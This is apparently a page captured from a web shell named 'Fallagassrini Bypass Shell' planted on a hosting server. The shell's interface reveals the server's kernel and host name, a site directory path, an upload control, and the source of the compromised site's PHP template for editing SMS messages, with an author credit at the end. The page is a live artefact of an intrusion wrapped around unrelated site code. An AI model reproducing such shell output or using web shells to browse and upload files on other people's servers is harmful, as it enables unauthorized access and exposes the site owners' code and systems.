? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/busybees/application/views/sms/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/busybees/application/views/sms/edit_sms_template.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>


<div class="icons_main">
    <div  class="icons">   
        <img src="<?= base_url() ?>assets/images/back.png" title="Back" class="clickimage" onclick="viewdata('sms','viewinsmssearch','search_sms_template','view_sms_template','<?= $_SESSION['pagenum']; ?>')" alt="Back" align = "center" width="32" height="32"  />
    </div>
    <div class="icons_caption">
        <h4>Creating sms Templates</h4>
    </div>
</div>
<?php
$attributes = array('id' => 'validateform', 'class' => 'validate');
echo form_open('sms/addinsms/update_sms_template/view_sms_template/1', $attributes);
?>

<div class="grid_12">
    <div class="box">
        <div class="header">
            <span></span>
        </div>
        <div class="content no-padding">
            <div class="section _100">
                <label>Template Title</label>
                <div class="single_page">
                    <input class="text required" name="template_title" id="template_title" type="text" value="<?= $viewinfo->template_title ?>" style="width:250px"/>                   
                </div>
            </div>

            <div class="section _100">
                <label>Contents</label>
                <div class="single_page">
                    <textarea class="required" name="content" id="wysiwyg" cols="70" rows="15" style="width: 500px;height: 150px;" ><?= $viewinfo->content ?></textarea>
                </div>
            </div>
        </div>

        <div class="actions"> 
            <div class="actions-left">
                <input type="reset" />
                <input type="hidden" name="resfunction" value="search_sms_template"/>
                <input type="hidden" name="template_id" value="<?= $viewinfo->template_id ?>"/>
            </div>           
            <div class="actions-right">
                <button type="submit" id="submit" class="clickimage" onclick="addformdata('validateform')">Save</button>
            </div>
        </div>    

    </div> 
</div> 
<?php echo form_close(); ?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net